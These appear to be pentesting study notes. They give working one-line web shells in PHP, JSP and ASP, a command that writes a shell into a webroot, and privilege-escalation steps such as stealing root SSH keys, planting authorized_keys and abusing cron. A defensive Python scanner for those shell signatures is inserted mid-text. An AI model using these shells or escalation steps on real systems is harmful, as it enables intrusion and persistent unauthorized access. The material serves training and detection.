1. Web shell scripts
<?php system($_REQUEST["cmd"]); ?>
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
<% eval request("cmd") %>
2. Uploading a webshell
- Common default webroots
1) Apache: /var/www/html/
2) Nginx: /usr/local/nginx/html/
3) IIS: c:/inetpub/wwwroot/
4) XAMPP: C:/xampp/htdocs/
- We can check these directories to see which webroot is in use and then use echo to write our web shell into it.
echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
3. Accessing the webshell
We can visit the created PHP page and use ?cmd={command} to execute terminal commands on the compromised website.
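From the defender's side, the three one-liners above and the default webroot list give a concrete detection: walk each webroot and flag script files whose contents match those patterns. The scanner below is an added example for these notes, not taken from any tool; the signature names, the list of script suffixes and the size limit are assumptions.

```python
"""Scan default webroots for the one-line web shells quoted in these notes."""
import re
from pathlib import Path
from typing import Iterator

# Default webroots from these notes (Linux and Windows); non-existent ones are skipped.
DEFAULT_WEBROOTS = [
    "/var/www/html", "/usr/local/nginx/html",
    "C:/inetpub/wwwroot", "C:/xampp/htdocs",
]

# Signatures derived from the PHP, JSP and ASP shells above. They are loosened a little
# (other PHP exec functions, GET/POST as well as REQUEST) so trivial renames still hit.
WEBSHELL_SIGNATURES = {
    "php-system-request": re.compile(
        rb"\b(system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(REQUEST|GET|POST)\b", re.I),
    "jsp-runtime-exec": re.compile(
        rb"Runtime\.getRuntime\(\)\.exec\s*\(\s*request\.getParameter", re.I),
    "asp-eval-request": re.compile(rb"\beval\s*\(?\s*request\s*\(", re.I),
}

# Assumed set of server-side script extensions worth reading; everything else is skipped.
SCRIPT_SUFFIXES = {".php", ".phtml", ".php5", ".jsp", ".jspx", ".asp", ".aspx"}
MAX_BYTES = 1_000_000  # assumption: only the first 1 MB of each file is inspected

def scan_bytes(content: bytes) -> list[str]:
    """Return the names of every signature that matches the given file content."""
    return [name for name, pat in WEBSHELL_SIGNATURES.items() if pat.search(content)]

def scan_tree(root: str) -> Iterator[tuple[str, list[str]]]:
    """Yield (path, matched_signatures) for each suspicious script under a webroot."""
    base = Path(root)
    if not base.is_dir():
        return
    for path in base.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_SUFFIXES:
            continue
        try:
            hits = scan_bytes(path.read_bytes()[:MAX_BYTES])
        except OSError:  # unreadable file: report nothing rather than abort the scan
            continue
        if hits:
            yield str(path), hits

if __name__ == "__main__":
    for webroot in DEFAULT_WEBROOTS:
        for found, sigs in scan_tree(webroot):
            print(f"[!] {found}: {', '.join(sigs)}")
```

Run it periodically or from a file-integrity alert; a hit on a file the deployment did not ship is the signal to investigate who could write to that webroot.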
4. hacktricks: privesc checklists
https://book.hacktricks.xyz/
5. privesc enumeration scripts
1) linux: LinEnum, linuxprivchecker
2) windows: Seatbelt, JAWS
3) both: PEASS
6. privesc vectors
1) kernel exploit:
whenever we encounter a server running an old OS (e.g., an old Linux kernel version), we should start by looking for potential kernel vulns
2) vulnerable software
- Linux: dpkg -l
- Windows: C:/Program Files
3) User privileges: privileges available to the user we have access to.
- sudo
- SUID
- Windows token privileges
* A list of applications
(1) linux: GTFOBins
(2) windows: LOLBAS
4) scheduled tasks
(1) linux: cron jobs
(2) windows: scheduled tasks
- there are 2 ways to exploit scheduled tasks:
(1) add new scheduled tasks
(2) trick existing tasks into executing malicious software
- there are specific directories that we may be able to utilize to add new cron jobs if we have write permissions over them:
(1) /etc/crontab
(2) /etc/cron.d
(3) /var/spool/cron/crontabs/root
5) exposed credentials
6) ssh keys:
(1) if we have read access over the .ssh directory
- /home/user/.ssh/id_rsa
- /root/.ssh/id_rsa
: copy these and use them to log in over ssh (e.g., ssh root@10.10.10.10 -i id_rsa)
(2) if we have write access over the .ssh directory
a. gain a shell as the user
b. ssh-keygen -f key: generate a key pair (on our host)
-> output files: key (private), key.pub (public)
c. copy key.pub and add it to /root/.ssh/authorized_keys (on the target machine)
d. now we can log in over ssh as that user using our private key